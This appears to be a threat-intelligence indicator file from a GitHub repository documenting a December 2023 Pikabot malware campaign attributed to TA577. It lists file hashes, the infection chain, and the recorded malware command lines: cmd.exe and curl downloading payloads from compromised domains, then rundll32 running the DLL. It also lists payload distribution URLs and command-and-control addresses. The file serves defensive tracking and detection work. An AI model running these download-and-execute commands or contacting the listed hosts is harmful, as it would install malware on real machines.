-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathPikabot_22.12.2023.txt
104 lines (72 loc) · 6.2 KB
/
Pikabot_22.12.2023.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
22.12.2023 | Pikabot | TA577 | 1.1.19-ghost
*************************************************
.pdf 994e9d25da5d1d00bd0156991b1de00e7228c8423eed97f305514d518a509e8d
.url https://saibabacartransport.com/osihj/?cf1HFxObd8fRMMm5FfU51Wud6vE
.zip 2e53d6eb8f0d96b6c371089f44954e1b3a73159ceb7076e8824e5081eb9a748f
.dll 16d318c6335fffd2f2d2f1629edfa0c39bbe99cc77030d4601d43f6315c13e02
.zip d95c987423f2a2df57dccd6d9457804edddf58e28ba59cf22e8efc6beee7da09
.dll 374d1476191b32a90334ec0f874949e14c4ce2d8098294b4e322cccdcf6dbe32
*************************************************
pdf > url > zip > js > curl > .dll
wscript.exe C:\Users\Admin\AppData\Local\Temp\Notesjl.js
cmd.exe /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://ucakbiletsorgulama.com/U14/0.6604636713043338.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
curl https://ucakbiletsorgulama.com/U14/0.6604636713043338.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
cmd.exe /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://mexicopostalcode.com/51h6Kn/0.73154014266961.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
curl https://mexicopostalcode.com/51h6Kn/0.73154014266961.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
cmd.exe /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://adanacigkoftesiparis.com/ViUbB/0.4794982785991857.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
curl https://adanacigkoftesiparis.com/ViUbB/0.4794982785991857.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
cmd.exe /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://kartvizitfiyatlari.com/rLhb/0.4092860312823935.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
curl https://kartvizitfiyatlari.com/rLhb/0.4092860312823935.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
cmd.exe /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://adanacamasiryikama.com/BDs19Ul/0.8639579070704284.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
curl https://adanacamasiryikama.com/BDs19Ul/0.8639579070704284.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
cmd.exe /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl 0.3090409960983732.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
curl 0.3090409960983732.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
cmd.exe /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl 0.8262833647995473.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
curl 0.8262833647995473.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
cmd.exe /c timeout 10 & rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter
timeout 10
rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter
*************************************************
**** .dll distro ****
https://adanacamasiryikama.com/BDs19Ul/0.17061133165068715.dat
https://kartvizitfiyatlari.com/rLhb/0.5991546204420577.dat
https://adanacigkoftesiparis.com/ViUbB/0.45625095726666564.dat
https://mexicopostalcode.com/51h6Kn/0.10488555301618846.dat
https://ucakbiletsorgulama.com/U14/0.44170515690096146.dat
https://sakshiconstructioncompany.com/bc1WDy2/0.7070941415013887.dat
https://expressreparation.com/cBB/0.7466311972818431.dat
https://fineclippingpath.com/zD6AAu/0.6803039392149672.dat
https://doorbell.api.net.bd/j2l1/0.5720348080422888.dat
*************************************************
c2's
https://46.250.253.58:5243
https://89.117.55.178:2083
https://85.239.237.153:5632
https://154.38.164.50:5243
https://144.91.113.0:13721
https://154.38.185.138:13786
https://154.211.12.126:2967
https://109.123.227.147:5243
https://185.187.235.158:23399
https://5.180.151.194:5631
https://109.123.227.170:5632
https://154.38.185.136:5243
https://5.180.151.180:2224
https://109.123.227.166:5938
https://51.161.81.190:13721
https://46.250.253.58:5243/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://89.117.55.178:2083/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://85.239.237.153:5632/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://154.38.164.50:5243/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://144.91.113.0:13721/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://154.38.185.138:13786/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://154.211.12.126:2967/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://109.123.227.147:5243/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://185.187.235.158:23399/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://5.180.151.194:5631/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://109.123.227.170:5632/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://154.38.185.136:5243/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://5.180.151.180:2224/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://109.123.227.166:5938/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
https://51.161.81.190:13721/slowness/YeLLdXhxPozWAJMhK?spinosity=underregistrationDesexualizing&antitubercularKilter=conoscentiNontrade&egyptologer=wfWJlPdRQU8lP3
*************************************************